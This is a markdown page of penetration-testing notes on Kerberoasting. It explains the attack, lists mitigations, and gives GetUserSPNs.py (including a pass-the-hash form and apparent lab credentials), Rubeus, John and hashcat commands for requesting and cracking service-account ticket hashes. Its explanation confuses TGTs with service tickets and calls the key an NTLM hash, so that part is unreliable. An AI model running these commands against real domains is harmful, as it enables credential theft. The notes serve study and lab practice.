Skip to content

Latest commit

 

History

History
74 lines (50 loc) · 3.37 KB

kerberoasting.md

File metadata and controls

74 lines (50 loc) · 3.37 KB

Kerberoasting

Introduction

Kerberos encrypts Ticket Granting Tickets (TGTs) that are provided from the Domain Controller (DC) -- Which typically acts as the Key Distribution Center (KDC) against a user's Kerberos hash. Kerberoasting means that a user has a Service Principal Name (SPN) associated with it. We can then theoretically request the SPN from the DC to send us the hash for us to crack. Therefore, to perform Kerberoasting, only a domain account that can request for TGSs is necessary, which is anyone since no special privileges are required.

Note: You NEED valid credentials inside the domain to perform this attack.

High-Level Understanding

  • It is important that we focus on the KRB-TGS-REQ and KRB-TGS-REP
  • With the REQ portion, you are requesting the TGT from the TGS
  • With the REP portion, you are obtaining the TGT reply that is encrypted with the NTLM hash of the account that the service is running under
    • This is typically a SPN
    • What does this look like?
  • You can then take the NTLM hash offline (obtained from the Kerberos TGT Reply message) and crack it
  • You can execute this attack remotely or locally as long as you have valid account credentials

Mitigation Strategies

  • Since kerberoasting takes advantage of the pure nature of Kerberos, there is no official mitigation strategy for it, simply recommendations
  • Therefore, enforcing strong and complex passwords throughout your domain is the best way to mitigate this threat
  • Rotate these credentials often; expiration times
  • Make sure your service accounts are using the least privilege possible
    • Do NOT put these accounts in the domain admins group

How To

Get-UserSPNs.py

  • Check if the user has a SPN with the following command:
Get-UserSPNs.py -request -dc-ip <IP> search.htb/hope.sharp:IsolationIsKey

# The SPN will appear as RESEARCH/web_svc.search.htb:60001
# You will also get a hash, save it and crack with John

john --wordlist=/usr/share/wordlists/rockyou.txt hash

# Or Hashcat

hashcat -m 13100 -a 0 kerberoast.txt /usr/share/wordlists/rockyou.txt
# -a 0 -- Execute dictionary attack against provided details with specified wordlist
# Domain Account/Credentials Method
GetUserSPNs.py -request -dc-ip 192.168.2.160 <DOMAIN.FULL>/<USERNAME> -outputfile hashes.kerberoast # Password will be prompted

# Domain Account/Credentials Method w/ Pass The Hash
GetUserSPNs.py -request -dc-ip 192.168.2.160 -hashes <LMHASH>:<NTHASH> <DOMAIN>/<USERNAME> -outputfile hashes.kerberoast

Grepping for Hashcat Formats

hashcat --help | grep etype

Rubeus

Rubeus.exe kerberoast

Reference

{% embed url="https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/kerberoast" %}